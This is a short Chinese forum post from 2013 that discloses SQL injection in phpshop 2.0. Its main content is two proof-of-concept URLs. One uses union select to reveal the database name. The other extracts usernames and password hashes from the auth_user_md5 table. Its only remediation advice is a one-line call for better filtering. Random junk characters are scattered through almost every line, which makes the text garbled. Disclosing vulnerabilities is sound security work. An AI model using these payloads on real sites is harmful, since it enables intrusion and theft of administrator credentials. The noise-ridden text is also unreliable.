标题 : phpshop 2.0 SQL Injection Vulnerability
% |. |. J' ]) r3 C+ c
' {. b- o, W& U; ?9 J U \" A作者 : By onestree
9 b- e$ J$ A/ V2 y% I. y下载地址 : http://code.google.com/p/phpshop/downloads/list; u# u' Y0 X c! }" ` Q! q
测试地址: windows 7 / ubuntu. b4 u: i0 ^ I- [
+ I6 m" @0 i, r1 Y: ^: }8 @$ ]
0 \; Q+ s: w. V# QSQLi p0c:& K: v/ f: u/ s7 I+ v$ g3 ~' {6 P
$ ^, V2 p5 N. }
==================; y& W8 F& e" x0 q6 M! A2 R
0 C% C# m5 d3 G* z3 b9 Phttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'5 B* t* X U% [/ `# ?7 ]
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --3 h5 j3 N! R' n8 M% Z+ V+ f
9 e! T( a. ~' Z' Y5 z4 @0 ?
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
; L% v# m! `( ~& D
6 o) P" J7 g- Q; y U8 L5 V8 V修复:) v5 E4 W j' W: ~2 `/ e
加强过滤4 f! x/ o! F& H L, i- n
6 h. f' @0 p2 P+ T% `: i& R4 `$ X0 E7 O5 ]
& L8 k) c; K9 I9 N5 Z |
发表于 2013-1-18 18:24:10
收藏
支持
反对